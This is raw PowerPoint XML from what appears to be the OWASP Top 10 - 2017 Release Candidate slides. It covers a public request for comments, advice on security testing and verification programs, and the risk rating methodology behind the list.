              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="3988629"/>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kern="1200" baseline="0" dirty="0" smtClean="0">
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Understand Your SDLC</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="5099878"/>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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>Choose the simplest, fastest, most accurate technique to verify each requirement. The </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0">
                  <a:hlinkClick r:id="rId6"/>
                </a:rPr>
                <a:t>OWASP Benchmark Project</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>, which helps measure the ability of security tools to detect many OWASP Top 10 risks, may be helpful in selecting the best tools for your specific needs. Be sure to consider the human resources required to deal with false positives as well as the serious dangers of false negatives.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="5003248"/>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dirty="0" smtClean="0"/>
                <a:t>Testing Strategies</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="6114496"/>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defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0"/>
                <a:t>You don’t have to start out testing everything. Focus on what’s important and expand your verification program over time. That means expanding the set of security defenses and risks that are being automatically verified, as well as expanding the set of applications and APIs being covered. The goal is to get to where the essential security of all your applications and APIs is verified continuously.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="6017867"/>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kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>Achieving Coverage</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0"/>
                <a:t> and Accuracy</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Freeform 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133034" y="7129115"/>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en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                <a:t>No matter how good</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                <a:t> you are at testing, it won’t make any difference unless you communicate it effectively. Build trust by showing you understand how the application works. Describe clearly how it can be abused without “lingo” and include an attack scenario to make it real. Make a realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that would be. Finally, deliver findings </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                <a:t>in the tools development teams are already using, not PDF files.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Freeform 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="192845" y="7032486"/>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dirty="0" smtClean="0"/>
                <a:t>Make Findings Awesome</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="-342900" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg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r>
              <a:rPr lang="mr-IN" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:endParaRPr lang="mr-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16893207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Release Candidate</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627099" y="1310640"/>
            <a:ext cx="3489738" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" smtClean="0"/>
              <a:t>Important Notice</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>RC</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754457349"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2286000"/>
          <a:ext cx="5657968" cy="5958840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5657968"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Request for Comments</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">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tr>
              <a:tr h="270344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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP plans to release the final public release of the OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Constructive comments on this OWASP Top 10 - 2017 Release Candidate should be forwarded via email to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>OWASP-TopTen@lists.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Private comments may be sent to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id=""/>
                        </a:rPr>
                        <a:t>dave.wichers@owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.  Anonymous comments are welcome.  All  non-private comments will be catalogued and published at the same time as the final public release.  Comments recommending changes to the items listed in the Top 10 should include a complete suggested list of 10 items, along with a rationale for any changes. All comments should indicate the specific relevant page and section.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Following the final publication of the OWASP Top 10 - 2017, the collaborative work of the OWASP community will continue with updates to supporting documents including the OWASP wiki, OWASP Developer’s Guide, OWASP Testing Guide, OWASP Code Review Guide, and the OWASP Prevention Cheat Sheets, along with translations of the Top 10 to many different languages.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Your feedback is critical to the continued success of the OWASP Top 10 and all other OWASP Projects. Thank you all for your dedication to improving the security of the world’s software for everyone.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kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Jeff Williams, OWASP Top 10 Project Creator and Coauthor</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Dave Wichers, OWASP Top 10 Coauthor and Project Lead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smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1135468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1635998230"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143001"/>
          <a:ext cx="6858000" cy="8046718"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="380999">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Your Application Security Program Now</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="F9FBFD"/>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tr>
              <a:tr h="76657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t>Application security is no longer optional.  Between increasing attacks and regulatory pressures, organizations must establish an effective capability for securing their applications and APIs.  Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.  OWASP recommends that organizations establish an application security program to gain insight and improve security across their application portfolio.  Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, and business and executive management. It requires security to be visible, so that all the different players can see and understand the organization’s application security posture.  It also requires focus on the activities and outcomes that actually help improve enterprise security by reducing risk in the most cost effective manner.  Some of the key activities in effective application security programs include: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solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What’s Next for Organizations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Diagram 11"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1879056966"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-914400" y="2990125"/>
          <a:ext cx="8686800" cy="6096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Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>+O</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>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290204440"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="8046720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>It’s About</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Risks, Not Weaknesses</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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tr>
              <a:tr h="7665720">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1000" dirty="0" smtClean="0"/>
                        <a:t>Although the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>2007</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> and earlier versions of the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> focused on identifying the most prevalent “vulnerabilities,” the OWASP Top 10 has always been organized around risks. This focus on risks has caused some understandable confusion on</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> the part of people searching for an airtight weakness taxonomy. The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>OWASP Top 10 for</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t> 2010</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> clarified</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> the risk-focus in the Top 10 by being very explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks. This version of the OWASP Top 10 continues to follow the same methodology.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>The Risk Rating methodology for the Top 10 is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> For each Top 10 item, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common weakness. We then rank ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application. These factors get updated with each new Top 10 release as things change.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs. Consequently, we can never be as precise as system owners can be when calculating risks for their application(s). You are best equipped to judge the importance of your applications and data, what your threats are, and how your system has been built and is being operated.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>Our methodology includes three</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>likelihood factors for each</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> weakness </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>, detectability,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and ease of exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>) and one</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> impact factor (technical impact). </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>The prevalence of a weakness is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Attribution section on page 4) and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each weakness. The likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top 10.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
